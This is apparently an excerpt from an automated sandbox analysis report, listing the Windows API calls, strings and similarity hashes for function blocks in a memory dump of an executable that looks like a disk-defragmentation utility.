                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,113262B6,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00410AB3
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00410AC5
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105,00000000), ref: 00410AFA
                                                                                                                                                                                                                                                                                      • Part of subcall function 00414FD0: GetParent.USER32(?), ref: 00414FD4
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000108E,00000000,00000000), ref: 00410AE5
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Parent$CriticalEnterMessageRedrawSectionSendWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1290606431-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 143fed41e4f3855d081119d730e229c73714f0bc93d99b8b5aa2bb9d49ef1950
                                                                                                                                                                                                                                                                                    • Instruction ID: 5206ba9288f2f952280e77a0a87cb2f91fe58ff6aeb235107940afbc2e9b071e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 143fed41e4f3855d081119d730e229c73714f0bc93d99b8b5aa2bb9d49ef1950
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5631B1723087049BD320DF64DC81F9BB3A4FB98720F10461EE9498B780DB79E841CB9A
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ClearVariant$AllocString
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2502263055-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 4b2ef0f21c238e92dbe494a8f0535b867e123380ff90faf569da88cc72c8f9fe
                                                                                                                                                                                                                                                                                    • Instruction ID: d31ef5bb5228e6c3ad645c8f3d1319e11389829958ef149dbed2cab14c92e82a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b2ef0f21c238e92dbe494a8f0535b867e123380ff90faf569da88cc72c8f9fe
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15316F722087059FC310CF58C880B5BB7E8EF88718F104A2EF95997350DB79E909CB9A
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 0041056D
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0041058D
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041AA90: GetDC.USER32(?), ref: 0041AADC
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041AA90: SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0041AAF4
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041AA90: GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 0041AB1C
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041AA90: ReleaseDC.USER32(?,?), ref: 0041AB37
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,00000000), ref: 004105E2
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0041063B
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$Rect$ExtentMessagePoint32ReleaseSendText
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2970461787-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 57304bb34f2a7c9d27d57c86e6bfdf64e083342261e5794d1aa935df15270c11
                                                                                                                                                                                                                                                                                    • Instruction ID: ce4c3b2ba86c6f6c119685c1f909f4ca062621dcfedb5de8325838dac45ff1a4
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 57304bb34f2a7c9d27d57c86e6bfdf64e083342261e5794d1aa935df15270c11
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2314071244305AFD204DF61CCC5FABB3E9EBC8748F048A0CF58957290D674EA468B65
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDC.USER32(?), ref: 0040F162
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0040F17A
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040F19B
                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 0040F210
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ClientMessageRectReleaseSend
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1863454828-0
                                                                                                                                                                                                                                                                                    • Opcode ID: d11ef34d3e0fffcceb367614637f6adb86afbda3cb939e7e07ff16f8205efc76
                                                                                                                                                                                                                                                                                    • Instruction ID: d6bf508d08b3a67db9d2b0dabc6a54fdde4e7c081a099a00f88e8aa49dac70a3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d11ef34d3e0fffcceb367614637f6adb86afbda3cb939e7e07ff16f8205efc76
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C3128B5204341AFC314DF68C984E5AB7E9FB88610F104A1EF559C3290EB34A905CB55
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: __aulldiv__aullrem
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3839614884-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 6861e29f0088fe8bf2482069452547d46f2b3a812a60965592cc082a0fa155da
                                                                                                                                                                                                                                                                                    • Instruction ID: 61ee5ff977679a68600c6b3ba5455a9d5faea7aa6e4a004e82da9cd24f1d17ea
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6861e29f0088fe8bf2482069452547d46f2b3a812a60965592cc082a0fa155da
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B21D2B6608351AFC310DE59D880E6BBBE8EBD9305F00495DF8849B302D275EC458BB6
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00419AE0: GetModuleHandleW.KERNEL32(ntdll,NtQuerySystemInformation), ref: 00419B01
                                                                                                                                                                                                                                                                                      • Part of subcall function 00419AE0: GetProcAddress.KERNEL32(00000000), ref: 00419B08
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 004248FF
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AddressHandleModuleProcSleep
                                                                                                                                                                                                                                                                                    • String ID: CPUUsageExceed$DiskDefrag\AutoDefragmention$d
                                                                                                                                                                                                                                                                                    • API String ID: 451317006-1228882529
                                                                                                                                                                                                                                                                                    • Opcode ID: 927e2202433fb9e42a6fe3e98e5b36a04668a5a885c84e3f0056aeb2df8c8ff7
                                                                                                                                                                                                                                                                                    • Instruction ID: 2aae77fe05b5572fc9a22550ba8b2e73634bf3b6c40b7b563c05c91186231963
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 927e2202433fb9e42a6fe3e98e5b36a04668a5a885c84e3f0056aeb2df8c8ff7
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6021D439B102224BD724DE68DD84BE73351DFC4325F5A4279ED098F382DB66EC468299
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,00090073,?,00000008,00000000,00000800,?,00000000), ref: 00463572
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00463581
                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,00090073,?,00000008,00000000,?,?,00000000), ref: 004635C1
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004635C7
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ControlDeviceErrorLast
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2645620995-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 280114bd6b1db9933460ef4d3ecd134f68ed06276e5ba2ce953f9defbee2e827
                                                                                                                                                                                                                                                                                    • Instruction ID: 72788d8031d8da8ebdf27af98cafe7d3eb32084a5d4fa9d01f0a72895e77951c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 280114bd6b1db9933460ef4d3ecd134f68ed06276e5ba2ce953f9defbee2e827
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8711C4716003412BE3109B169C46BAB769CEBD1710F44483EF548E6151EAA8EA098BEF
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDC.USER32(?), ref: 0041AADC
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0041AAF4
                                                                                                                                                                                                                                                                                    • GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 0041AB1C
                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 0041AB37
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ExtentMessagePoint32ReleaseSendText
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3220701275-0
                                                                                                                                                                                                                                                                                    • Opcode ID: f4cd1229affaa01fb9d254a5843e7c69072dcfbfd1d68eba2fa87ff3b855b585
                                                                                                                                                                                                                                                                                    • Instruction ID: 1850dbf4910a2f6436d9a8060cce1c0b3c7b383cd418d825aeeea627d68539a0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4cd1229affaa01fb9d254a5843e7c69072dcfbfd1d68eba2fa87ff3b855b585
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79213AB5604601AFC714DF68D985F6AB7E8FB8C710F008A2DF459C3690DB74E8448B95
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00503B37
                                                                                                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00503B50
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Value___vcrt_
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1426506684-0
                                                                                                                                                                                                                                                                                    • Opcode ID: c3eb6bf0a7234faedb7c0a201c394f7478a2313920b75adf210bd18b39fa6472
                                                                                                                                                                                                                                                                                    • Instruction ID: 7e37d591e5fb7ec4360ecac0c59ba3527d828e2593e8c178730152400d6c93e2
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3eb6bf0a7234faedb7c0a201c394f7478a2313920b75adf210bd18b39fa6472
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD01DF322096625EEB643BB8FC8EA6F3F9CFB82778720033AF524550E1EF514E555149
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • __allrem.LIBCMT ref: 00454FE5
                                                                                                                                                                                                                                                                                    • __alldvrm.LIBCMT ref: 00454FF8
                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045500B
                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00455044
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__alldvrm__allrem
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2089711351-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 9e2e06a4a2c618b65764ecf02f880869a055206a9d0490231dd6032392fa1694
                                                                                                                                                                                                                                                                                    • Instruction ID: 1642b9dd75f3a4511d1f743995959062418e168b9dabd897861ea646df64c966
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e2e06a4a2c618b65764ecf02f880869a055206a9d0490231dd6032392fa1694
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44112AB5A00A00AFC324CF66C985D27BBE9EFC8714721C92EB59A87745D675FC40CB64
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,?), ref: 0046D047
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 0046D059
                                                                                                                                                                                                                                                                                    • SetCursor.USER32(?,?,?,?,0046CB00,?,00000000,?,?), ref: 0046D06F
                                                                                                                                                                                                                                                                                    • DestroyCursor.USER32(00000000), ref: 0046D07A
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Cursor$Load$Destroy
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2883253431-0
                                                                                                                                                                                                                                                                                    • Opcode ID: b526f51bf045ccedc4edf904a989a3b1655f38ad34df7115bdfe87dc4000c200
                                                                                                                                                                                                                                                                                    • Instruction ID: d6e58a44651a1d3402cb24b8e4ad2f5d6b0251b9aafb2ead04931a23fc49c706
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b526f51bf045ccedc4edf904a989a3b1655f38ad34df7115bdfe87dc4000c200
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E016771F142189FD730AF6AEC8096B37DCE756318F15083BE108D3211DA79A442877D
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00000000), ref: 004676B7
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000403,00000003,000001F4), ref: 004676CC
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000403,00000002,00001770), ref: 004676E1
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,00000190), ref: 004676F6
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: __aulldiv
                                                                                                                                                                                                                                                                                    • String ID: `=
                                                                                                                                                                                                                                                                                    • API String ID: 3732870572-2762138152
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045D3BE
                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045D3D1
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                    • String ID: `=
                                                                                                                                                                                                                                                                                    • API String ID: 885266447-2762138152
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: __aulldiv
                                                                                                                                                                                                                                                                                    • String ID: `=
                                                                                                                                                                                                                                                                                    • API String ID: 3732870572-2762138152
                                                                                                                                                                                                                                                                                    • Opcode ID: 3015ac86ba649a29268a85483f7edd6aab0f416968bd909a9fe1b0c52b9cb0c5
                                                                                                                                                                                                                                                                                    • Instruction ID: 84b8ef7fa6ef3b0704b7dcc146b1b846a3d4774a27478fb056f40241b994564c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3015ac86ba649a29268a85483f7edd6aab0f416968bd909a9fe1b0c52b9cb0c5
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46719C71A046049FC724EF64C884A6BB7E4FF88311F14896EFC4687352D775E849CBAA
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,113262B6,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                    • SHQueryRecycleBinW.SHELL32(?,?), ref: 0042B1A8
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalEnterQueryRecycleSection
                                                                                                                                                                                                                                                                                    • String ID: C:\$`=
                                                                                                                                                                                                                                                                                    • API String ID: 1132591718-3292444104
                                                                                                                                                                                                                                                                                    • Opcode ID: 85201a436fdb5bbfeaee31a0dc8f4d63786e17b77ffd3cec1582f3d352d27140
                                                                                                                                                                                                                                                                                    • Instruction ID: acc36582b151d86fb2590580dfdaf1570fbc9ca1bde0f0bfc179c8702fc33688
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 85201a436fdb5bbfeaee31a0dc8f4d63786e17b77ffd3cec1582f3d352d27140
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F716D71604351CFC720EF64D981BAFB7E4FF88354F41892EE89997250D734A944CBAA
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000), ref: 00456370
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?), ref: 004563C5
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                    • String ID: P
                                                                                                                                                                                                                                                                                    • API String ID: 2050909247-3110715001
                                                                                                                                                                                                                                                                                    • Opcode ID: 225ffd7624e7e299ef96e9004fd2a35e3cd367921e50112ae392b81e183853ea
                                                                                                                                                                                                                                                                                    • Instruction ID: d9fc715740b337443135b9810308ba2b6a4282878f9a2242fee2fe4f623e65b9
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 225ffd7624e7e299ef96e9004fd2a35e3cd367921e50112ae392b81e183853ea
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6951A0716006119BC710DF68D88466AB7A4FF89715F514B2FED2487392CB78EC48CBDA
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,113262B6,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                      • Part of subcall function 004197C0: CoInitialize.OLE32(00000000), ref: 004197EE
                                                                                                                                                                                                                                                                                      • Part of subcall function 004197C0: CoCreateInstance.OLE32(0047D090,00000000,00000001,0047CFC0,?,?,?,00000000), ref: 00419812
                                                                                                                                                                                                                                                                                      • Part of subcall function 004197C0: CoUninitialize.OLE32(?,?,00000000,?,?,?,?,?,?,?,?,?,00000000,00475709,000000FF,0041DB54), ref: 0041981C
                                                                                                                                                                                                                                                                                    • GetLogicalDrives.KERNEL32 ref: 00427273
                                                                                                                                                                                                                                                                                    • GetDriveTypeW.KERNEL32(?), ref: 004272D7
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateCriticalDriveDrivesEnterInitializeInstanceLogicalSectionTypeUninitialize
                                                                                                                                                                                                                                                                                    • String ID: C:\
                                                                                                                                                                                                                                                                                    • API String ID: 2354564324-3404278061
                                                                                                                                                                                                                                                                                    • Opcode ID: f60440959189295cd425f4ed1094c27380a597b75a56eb5106b80638b3ca90fc
                                                                                                                                                                                                                                                                                    • Instruction ID: c90efa92af71126dba6429048660511b38e7c0dbb77debf846213f4ca3b284e1
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f60440959189295cd425f4ed1094c27380a597b75a56eb5106b80638b3ca90fc
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A518971A187519FC314DF29D881A5BBBE4FF88714F804A2EF899C7390D734A904CB8A
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Catch
                                                                                                                                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                                                                                                                                    • API String ID: 78271584-2084237596
                                                                                                                                                                                                                                                                                    • Opcode ID: 60d334a2babda9015152320fb1b56685fe8a5b2565357ad46f9000524526b17b
                                                                                                                                                                                                                                                                                    • Instruction ID: 7f3e499a65fa1b5ee95370a69dc2f62e8b798b9dea4c67a4a9596effe2b86ecb
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60d334a2babda9015152320fb1b56685fe8a5b2565357ad46f9000524526b17b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 754159B1900209AFCF15DF98CD85AEEBFB5BF48304F1485A9FA04A6291D335AD60DF50
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: ~P
                                                                                                                                                                                                                                                                                    • API String ID: 0-500931198
                                                                                                                                                                                                                                                                                    • Opcode ID: af959c50f9ceb22731f565f3fb959b59621721a55135329773564823bcb7b730
